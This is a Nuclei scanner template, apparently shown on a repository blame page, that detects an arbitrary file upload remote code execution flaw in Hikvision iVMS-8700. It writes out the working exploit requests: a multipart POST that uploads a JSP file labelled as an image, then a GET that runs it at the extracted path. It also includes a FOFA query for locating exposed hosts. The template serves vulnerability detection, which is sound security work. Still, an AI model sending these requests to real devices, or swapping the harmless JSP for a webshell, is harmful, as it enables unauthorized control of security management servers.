nuclei-templates/http/vulnerabilities/hikvision/hikvision-ivms-file-upload-...

id: hikvision-ivms-file-upload-rce

info:
  name: Hikvision iVMS-8700 - File Upload Remote Code Execution
  author: brucelsone
  severity: critical
  description: |
    Arbitrary file upload vulnerability in HIKVISION iVMS-8700 Integrated Security Management Platform Software allows attackers to upload and execute malicious files, leading to potential unauthorized server control.
  reference:
    - https://www.wangan.com/p/11v754aceadb994f
    - https://cn-sec.com/archives/1828326.html
  metadata:
    max-request: 2
    fofa-query: icon_hash="-911494769"
  tags: hikvision,ivms,fileupload,rce,intrusive
variables:
  str1: '{{rand_base(6)}}'
  str2: '{{rand_base(6)}}'
  str3: '<%out.print("{{str2}}");%>'

http:
  - raw:
      - |
        POST /eps/resourceOperations/upload.action HTTP/1.1
        Host: {{Hostname}}
        User-Agent: MicroMessenger
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj

        ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
        Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp"
        Content-Type: image/jpeg

        {{str3}}
        ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
      - |
        GET /eps/upload/{{res_id}}.jsp HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: res_id
        json:
          - ".data.resourceUuid"
        internal: true
    matchers:
      - type: dsl
        dsl:
          - body_2 == str2

# digest: 4a0a0047304502210089055b5e6490a37a160393cd47fa330bc79f2383fc6cbcd3f6571fbf43ae5f4f0220460801f2a318cfa57428386d29e972d62c92b11657035633c08171f1fb083146:922c64590222798bb761d5b6d8e72950
Added Hikvision iVMS-8700 - File Upload Remote Code Execution (#7536) Co-authored-by: brucelsone <101378596+brucelsone@users.noreply.github.com> 2023-06-25 09:02:37 +00:00			`id: hikvision-ivms-file-upload-rce`

			`info:`
			`name: Hikvision iVMS-8700 - File Upload Remote Code Execution`
			`author: brucelsone`
			`severity: critical`
			`description: \|`
			`Arbitrary file upload vulnerability in HIKVISION iVMS-8700 Integrated Security Management Platform Software allows attackers to upload and execute malicious files, leading to potential unauthorized server control.`
			`reference:`
			`- https://www.wangan.com/p/11v754aceadb994f`
			`- https://cn-sec.com/archives/1828326.html`
			`metadata:`
			`max-request: 2`
			`fofa-query: icon_hash="-911494769"`
			`tags: hikvision,ivms,fileupload,rce,intrusive`
			`variables:`
			`str1: '{{rand_base(6)}}'`
			`str2: '{{rand_base(6)}}'`
			`str3: '<%out.print("{{str2}}");%>'`

			`http:`
			`- raw:`
			`- \|`
			`POST /eps/resourceOperations/upload.action HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: MicroMessenger`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj`

			`------WebKitFormBoundaryTJyhtTNqdMNLZLhj`
			`Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp"`
			`Content-Type: image/jpeg`

			`{{str3}}`
			`------WebKitFormBoundaryTJyhtTNqdMNLZLhj--`
			`- \|`
			`GET /eps/upload/{{res_id}}.jsp HTTP/1.1`
			`Host: {{Hostname}}`

			`extractors:`
			`- type: json`
			`name: res_id`
			`json:`
			`- ".data.resourceUuid"`
			`internal: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
Rename http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml to http/vulnerabilities/hikvision/hikvision-ivms-file-upload-rce.yaml 2023-08-24 10:45:57 +00:00			`- body_2 == str2`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a0047304502210089055b5e6490a37a160393cd47fa330bc79f2383fc6cbcd3f6571fbf43ae5f4f0220460801f2a318cfa57428386d29e972d62c92b11657035633c08171f1fb083146:922c64590222798bb761d5b6d8e72950`